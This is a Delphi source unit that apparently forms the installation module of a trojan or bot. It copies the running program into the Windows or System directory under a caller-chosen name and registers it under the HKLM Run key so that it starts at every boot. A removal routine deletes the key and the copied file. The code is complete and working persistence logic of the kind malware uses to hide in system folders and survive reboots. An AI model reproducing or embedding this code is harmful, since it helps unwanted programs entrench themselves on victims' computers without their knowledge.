(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untInstalation.pas                              ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Procedures that manipulate the registry       ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untInstalation;

interface

procedure Install(lpExeName,lpRegKey,lpDir:string;var lpResultDir:string);
procedure Remove(lpExeName,lpRegKey,lpDir:string);

implementation

uses Windows, SysUtils, Registry, Forms, untFunctions;

procedure Install(lpExeName,lpRegKey,lpDir:string;var lpResultDir:string);
var
   Reg:TRegistry;
   cPath,Win:string;
begin
   lpDir:=UpperCase(Trim(lpDir));
   if lpDir = 'W' then
      Win:=AdjustFolder(WinDir) + Trim(lpExeName)
   else
      Win:=AdjustFolder(SysDir) + Trim(lpExeName);
   cPath:=Application.ExeName;
   Reg:=TRegistry.Create;
   Reg.RootKey:=HKEY_LOCAL_MACHINE;
   Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',False);
   Reg.WriteString(Trim(lpRegKey),Win);
   Reg.CloseKey;
   Reg.Free;
   if (cPath <> Win) then
   begin
      if FileExists(Win) then DeleteFile(Win);
      CopyFile(PChar(cPath),PChar(Win),False);
   end;
   lpResultDir:=Win;
end;

procedure Remove(lpExeName,lpRegKey,lpDir:string);
var
   Reg:TRegistry;
   Win:string;
begin
   lpDir:=UpperCase(Trim(lpDir));
   if lpDir = 'W' then
      Win:=AdjustFolder(WinDir) + Trim(lpExeName)
   else
      Win:=AdjustFolder(SysDir) + Trim(lpExeName);
   Reg:=TRegistry.Create;
   Reg.RootKey:=HKEY_LOCAL_MACHINE;
   Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',False);
   if Reg.ValueExists(Trim(lpRegKey)) then
      Reg.DeleteValue(Trim(lpRegKey));
   Reg.CloseKey;
   Reg.Free;
   Application.Terminate;
   DeleteFile(PChar(Win));
end;

end.
